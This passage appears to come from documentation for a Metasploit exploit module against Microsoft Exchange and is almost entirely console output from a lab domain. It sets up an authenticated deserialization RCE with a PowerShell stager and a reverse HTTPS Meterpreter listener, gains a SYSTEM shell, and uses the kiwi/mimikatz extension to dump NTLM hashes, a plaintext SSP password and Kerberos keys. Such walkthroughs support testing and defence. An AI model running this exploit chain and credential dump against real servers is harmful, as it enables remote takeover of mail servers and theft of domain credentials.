  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username          Domain         NTLM               SHA1               DPAPI
--------          ------         ----               ----               -----
Administrator     TESTINGDOMAIN  373b765d01cd8aefe  220cface685ef2b97  c5c54fb2b86a1a4a85
                                 a318e3843980454    a998f965b0d9b996b  e6b23ad360777e
                                                    55d560
DC1$              TESTINGDOMAIN  bc7047881521a2844  1489def7ac6e5dd8e
                                 573cd9b08cb33ed    ebf9d421549375da8
                                                    9bef2d
HealthMailbox25a  TESTINGDOMAIN  c9cd8580d9a519f7d  f5a89bd625da37ca3  c0f96c3c13864ffe1f
d078                             3fe3b47e4e55f21    e9de89be8bba67e1b  6b62f2d0811bb1
                                                    7d509b

ssp credentials
===============

Username                      Domain  Password
--------                      ------  --------
HealthMailbox25ad0782aada405  (null)  5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f
eaaa7287c8c514daf@testingdom          >)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9o
ain.internal                          OeVGtzP=qPZ@9xT-uR)niraV42

wdigest credentials
===================

Username              Domain         Password
--------              ------         --------
(null)                (null)         (null)
Administrator         TESTINGDOMAIN  (null)
DC1$                  TESTINGDOMAIN  (null)
HealthMailbox25ad078  TESTINGDOMAIN  (null)

kerberos credentials
====================

Username              Domain                  Password
--------              ------                  --------
(null)                (null)                  (null)
Administrator         TESTINGDOMAIN.INTERNAL  (null)
DC1$                  testingdomain.internal  4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 7
                                              2 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50
                                               ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0
                                              33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 0
                                              8 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6
                                               88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec
                                              b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 7
                                              3 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e
                                               61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2
                                              e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 6
                                              6 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29
                                               9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b
                                              f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 4
                                              6 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e
                                               25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8
                                              83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 a
                                              a 3b f2 df ea c1 f6 77 a6 bb cb
HealthMailbox25ad078  TESTINGDOMAIN.INTERNAL  (null)
dc1$                  TESTINGDOMAIN.INTERNAL  (null)


meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.31.160.218 - Meterpreter session 2 closed.  Reason: User exit
```
#### Target 2 - PowerShell Stager
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
RHOST => 172.31.160.218
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
LHOST => 172.31.171.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
target => 2
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options

Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
                                            change server
   HttpUsername  administrator    yes       The username to log into the Exchange server
                                            as
   Proxies                        no        A proxy chain of format type:host:port[,type:
                                            host:port][...]
   RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/ra
                                            pid7/metasploit-framework/wiki/Using-Metasplo
                                            it
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
                                             on. This must be an address on the local mac
                                            hine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is
                                            randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is r
                                            andom)
   VHOST                          no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, proces
                                        s, none)
   LHOST     172.31.171.42    yes       The local listener hostname
   LPORT     4444             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit

[*] Started HTTPS reverse handler on https://172.31.171.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7x
[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Staging x64 payload (201308 bytes) ...
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 3 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:03:03 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username          Domain         NTLM               SHA1               DPAPI
--------          ------         ----               ----               -----
Administrator     TESTINGDOMAIN  373b765d01cd8aefe  220cface685ef2b97  c5c54fb2b86a1a4a85
                                 a318e3843980454    a998f965b0d9b996b  e6b23ad360777e
                                                    55d560
DC1$              TESTINGDOMAIN  bc7047881521a2844  1489def7ac6e5dd8e
                                 573cd9b08cb33ed    ebf9d421549375da8
                                                    9bef2d
HealthMailbox25a  TESTINGDOMAIN  c9cd8580d9a519f7d  f5a89bd625da37ca3  c0f96c3c13864ffe1f
d078                             3fe3b47e4e55f21    e9de89be8bba67e1b  6b62f2d0811bb1
                                                    7d509b

ssp credentials
===============

Username                      Domain  Password
--------                      ------  --------
HealthMailbox25ad0782aada405  (null)  5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f
eaaa7287c8c514daf@testingdom          >)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9o
ain.internal                          OeVGtzP=qPZ@9xT-uR)niraV42

wdigest credentials
===================

Username              Domain         Password
--------              ------         --------
(null)                (null)         (null)
Administrator         TESTINGDOMAIN  (null)
DC1$                  TESTINGDOMAIN  (null)
HealthMailbox25ad078  TESTINGDOMAIN  (null)

kerberos credentials
====================

Username              Domain                  Password
--------              ------                  --------
(null)                (null)                  (null)
Administrator         TESTINGDOMAIN.INTERNAL  (null)
DC1$                  testingdomain.internal  4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 7
                                              2 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50
                                               ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0
                                              33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 0
                                              8 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6
                                               88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec
                                              b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 7
                                              3 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e
                                               61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2
                                              e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 6
                                              6 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29
                                               9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b
                                              f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 4
                                              6 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e
                                               25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8
                                              83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 a
                                              a 3b f2 df ea c1 f6 77 a6 bb cb
HealthMailbox25ad078  TESTINGDOMAIN.INTERNAL  (null)
dc1$                  TESTINGDOMAIN.INTERNAL  (null)


meterpreter >
```
